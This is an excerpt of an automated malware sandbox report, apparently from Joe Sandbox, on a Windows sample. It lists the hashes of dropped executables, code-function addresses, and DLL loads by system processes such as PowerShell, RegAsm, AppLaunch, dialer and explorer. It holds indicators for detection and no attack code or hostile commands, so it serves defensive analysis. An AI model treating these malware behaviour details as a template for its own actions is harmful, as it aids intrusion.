Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71040144 14_2_000001FF71040144
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7105E94C 14_2_000001FF7105E94C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7105F198 14_2_000001FF7105F198
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71053A00 14_2_000001FF71053A00
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71063A15 14_2_000001FF71063A15
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71054A18 14_2_000001FF71054A18
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7106083C 14_2_000001FF7106083C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7104705C 14_2_000001FF7104705C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71054898 14_2_000001FF71054898
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF710558E0 14_2_000001FF710558E0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7105F908 14_2_000001FF7105F908
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_0040223E 19_2_0040223E
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_004025C5 19_2_004025C5
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_004025C5 22_2_004025C5
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_2_0040154C 23_2_0040154C
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00585072 24_2_00585072
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005AB06B 24_2_005AB06B
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005AB18B 24_2_005AB18B
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005A65E0 24_2_005A65E0
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00587862 24_2_00587862
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_0059B892 24_2_0059B892
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00584883 24_2_00584883
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005AA919 24_2_005AA919
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005A6A78 24_2_005A6A78
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00569A00 24_2_00569A00
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00589C03 24_2_00589C03
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005ABFC0 24_2_005ABFC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A2198 25_2_030A2198
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030BB35C 25_2_030BB35C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030AC2F9 25_2_030AC2F9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030F4438 25_2_030F4438
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030BB97E 25_2_030BB97E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030C5F08 25_2_030C5F08
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A6E6A 25_2_030A6E6A
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\F324.exe 82A6847B83BF25CB582BB942735A32197BD9B7B490CE50F34C4976005F4F9BED
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\F557.exe 2FA632C146A49F8C954B231EBCC0DF2CCDBECD23797D084C423C0010F3380332
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe 2FA632C146A49F8C954B231EBCC0DF2CCDBECD23797D084C423C0010F3380332
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\D4C0.vmt.exe 09846F324BEE9384EE50934E61B417FDE37B86D4CA60530E77C4D63920D3E94C
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 030A7F70 appears 32 times
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 030A8801 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: String function: 005813C2 appears 69 times
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: String function: 0057BF00 appears 136 times
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: String function: 00581A00 appears 39 times
One or more processes crash
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6252 -s 720
Sample file is different than original file name gathered from version info
Source: xwREqjHUEv.exe, 00000000.00000002.2013828842.0000000000445000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameWiFiDisplay.exeDVarFileInfo$ vs xwREqjHUEv.exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: tapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe Section loaded: mfsrcsnk.dll
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe Section loaded: webio.dll
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Users\user\AppData\Roaming\gfiecjd Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\F324.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\F324.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\F557.exe Section loaded: coremessaging.dll
